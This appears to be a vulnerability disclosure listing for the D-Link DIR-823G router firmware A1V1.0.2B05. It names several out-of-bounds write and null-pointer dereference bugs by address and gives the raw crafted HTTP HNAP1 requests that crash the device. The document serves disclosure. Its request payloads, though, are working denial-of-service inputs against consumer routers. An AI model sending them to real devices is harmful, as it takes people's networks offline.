• DIR-823G

    D-LINK DIR-823G OOBW 0x41D5B0

    D-LINK DIR-823G OOBW 0x41E2A0

    D-LINK DIR-823G OOBW 0x41E094

    D-LINK DIR-823G NPD 0x41C708

    D-LINK DIR-823G NPD 0x44900C

    D-LINK DIR-823G NPD 0x42444C

    D-LINK DIR-823G NPD 0x42B4C4

    D-LINK DIR-823G NPD 0x4116F0


    • Null-pointer dereferences
    • D-Link
    • DIR-823G
    • V1.0.2B05
    • goahead
    • [email protected]

    • A
    1. b'POST /HNAP1/?a=b HTTP/1.1\r\n:\r\nContent-Length: 1\r\n\r\nB'

      D-Link DIR-823G A1V1.0.2B05 was discovered to contain a Null-pointer dereferences in sub_41C488(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x41C708-e46f864c48114f45894f4563588d7968?pvs=4

    2. b'POST /HNAP1/ HTTP/1.1\r\nContent-Length: 303\r\nHNAP_AUTH: 182013CCC23251CDE1336D3AE3FF3ECD 1706003719\r\nSOAPAction: "http://purenetworks.com/HNAP1/GetWanSettings"\r\n\r\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">soap:Body<GetWanSettings xmlns="http://purenetworks.com/HNAP1/" /></soap:Body></soap:Envelope>\r\n' D-Link DIR-823G A1V1.0.2B05 was discovered to contain a Null-pointer dereferences in sub_4484A8(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x44900C-8f23082721854117bdea70b6113433fd?pvs=4

    3. buf1 = b'POST /HNAP1/ HTTP/1.1\r\nCookie: hasLogin=1;\r\nContent-Length: 312\r\nHNAP_AUTH: 182013CCC23251CDE1336D3AE3FF3ECD 1706003719\r\nSOAPAction: "http://purenetworks.com/HNAP1/SetIgnoreWizardConfig"\r\n\r\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">soap:Body<SetIgnoreWizardConfig xmlns="http://purenetworks.com/HNAP1/" /></soap:Body></soap:Envelope>\r\n' buf2 = b'POST / HTTP/1.1\r\nContent-Length: 1\r\n\r\nA' D-Link DIR-823G A1V1.0.2B05 was discovered to contain a Null-pointer dereferences in sub_4484A8(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.

      https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x42444C-34458f12482346b291f334eea12e6fd0?pvs=4

    4. buf = b'POST /HNAP1/ HTTP/1.1\r\nContent-Length: 246\r\nSOAPAction: "http://purenetworks.com/HNAP1/Login"\r\nCookie: hasLogin=0; uid=ujcI4DPmyw; PrivateKey=C8B843B87E7C03EF5F224D6D4949A7F1; timeout=37\r\n\r\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">soap:Body</soap:Body></soap:Envelope>' D-Link DIR-823G A1V1.0.2B05 was discovered to contain a Null-pointer dereferences in sub_42AF30(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.

      https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x42B4C4-dfeae31d711f414796e1d9eb9cea7d31?pvs=4

    5. buf1 = b'POST /HNAP1/ HTTP/1.1\r\nCookie: hasLogin=1;\r\nContent-Length: 312\r\nHNAP_AUTH: 182013CCC23251CDE1336D3AE3FF3ECD 1706003719\r\nSOAPAction: "http://purenetworks.com/HNAP1/SetIgnoreWizardConfig"\r\n\r\n<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">soap:Body<SetIgnoreWizardConfig xmlns="http://purenetworks.com/HNAP1/" /></soap:Body></soap:Envelope>\r\n'

    buf2 = b'GET /crash.html HTTP/1.1\r\n\r\n'

    D-Link DIR-823G A1V1.0.2B05 was discovered to contain a Null-pointer dereferences in sub_4110f4(). This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.

      [<https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x4116F0-5befc4a65457482c8c4dcb16910ab820?pvs=4>](<https://calm-healer-839.notion.site/D-LINK-DIR-823G-NPD-0x4116F0-5befc4a65457482c8c4dcb16910ab820>)